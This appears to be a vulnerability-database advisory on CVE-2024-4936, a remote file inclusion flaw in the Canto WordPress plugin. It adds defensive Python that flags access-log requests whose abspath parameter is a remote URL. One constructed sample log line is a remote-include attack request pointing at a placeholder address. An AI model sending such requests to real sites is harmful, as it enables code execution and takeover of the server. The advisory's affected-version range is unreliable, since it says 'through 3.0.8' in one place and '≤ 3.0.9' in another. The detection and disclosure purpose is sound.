CVE-2024-4936

Critical

Published: 14 June 2024
Modified: 08 April 2026
CVSS Score v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.1171 (93.8th percentile)
Risk Priority: 27 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2024-4936 is a critical-severity PHP Remote File Inclusion (CWE-98) vulnerability in the Canto plugin for WordPress (vendor: Canto). Its CVSS base score is 9.8 (Critical).

Operationally, it ranks in the top 6.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

The Canto plugin for WordPress is vulnerable to remote file inclusion in all versions through 3.0.8. The flaw exists in the abspath parameter handling within includes/lib/sizes.php and permits an unauthenticated attacker to supply a remote URL that the server will include and execute when the PHP allow_url_include directive is enabled on the target host. The issue carries a CVSS 3.1 score of 9.8.

An unauthenticated network attacker can exploit the vulnerability by sending a crafted request that references a remote file under their control. Successful exploitation results in arbitrary code execution on the web server with the privileges of the web-server process, giving the attacker full control over the affected WordPress site and any data it processes.

Public references from Wordfence and the WordPress plugin Trac indicate that the issue was addressed in a subsequent plugin release; administrators are advised to update to the newest version of the Canto plugin and to ensure allow_url_include remains disabled unless explicitly required.

The EPSS score for this CVE rose from a low baseline to a recorded peak of 0.1598, indicating that exploitation interest increased after public disclosure.
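As an added defender-side example (not part of this advisory or of the Canto plugin), the following Python scans a web access log for requests to includes/lib/sizes.php whose abspath value is a remote URL, and checks a php.ini-style file for the allow_url_include setting the advisory names as the exploitation precondition. The log lines, client addresses and ini fragment are constructed sample input, and the log format is assumed to be the Apache/nginx combined format.

```python
import re
from urllib.parse import urlsplit, parse_qs

VULNERABLE_PATH = "includes/lib/sizes.php"          # file the advisory names as the flaw's location
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}   # schemes include() fetches when allow_url_include is On

# Apache/nginx combined log: ip ident user [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def remote_abspath(request_target):
    """Return the remote URL passed in abspath, or None if this is not a remote-include attempt."""
    parts = urlsplit(request_target)
    if not parts.path.endswith(VULNERABLE_PATH):
        return None
    for value in parse_qs(parts.query).get("abspath", []):   # parse_qs percent-decodes values
        if urlsplit(value.strip()).scheme.lower() in REMOTE_SCHEMES:
            return value
    return None

def scan_access_log(lines):
    """Return (client_ip, timestamp, status, abspath) for each request matching the CVE-2024-4936 pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, ts, _method, target, status = m.groups()
            value = remote_abspath(target)
            if value is not None:
                hits.append((ip, ts, int(status), value))
    return hits

def allow_url_include_enabled(ini_text):
    """True if php.ini-style text turns allow_url_include on (PHP's default is Off)."""
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # strip ; comments
        key, sep, val = line.partition("=")
        if sep and key.strip().lower() == "allow_url_include":
            return val.strip().strip("\"'").lower() in {"1", "on", "true", "yes"}
    return False

# Constructed sample input: two benign requests and one remote-include attempt (TEST-NET addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [15/Jun/2024:10:01:02 +0000] "GET /wp-content/plugins/canto/includes/lib/sizes.php?abspath=/var/www/html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [15/Jun/2024:10:01:09 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Jun/2024:10:02:30 +0000] "GET /wp-content/plugins/canto/includes/lib/sizes.php?abspath=http%3A%2F%2F203.0.113.5%2Fx HTTP/1.1" 200 0 "-" "curl/8.0"',
]
SAMPLE_INI = "; constructed php.ini fragment\nallow_url_fopen = On\nallow_url_include = Off\n"

if __name__ == "__main__":                # stand-alone run over the constructed sample
    print(scan_access_log(SAMPLE_LOG), allow_url_include_enabled(SAMPLE_INI))
```

A hit with a 200 status on a host where allow_url_include is on should be treated as a likely compromise of the web-server account, not merely an attempt.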

Vulnerability details

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. This required allow_url_include to be enabled on the target site in order to exploit.

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

Vendor: canto
Product: canto
Versions: ≤ 3.0.9

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.
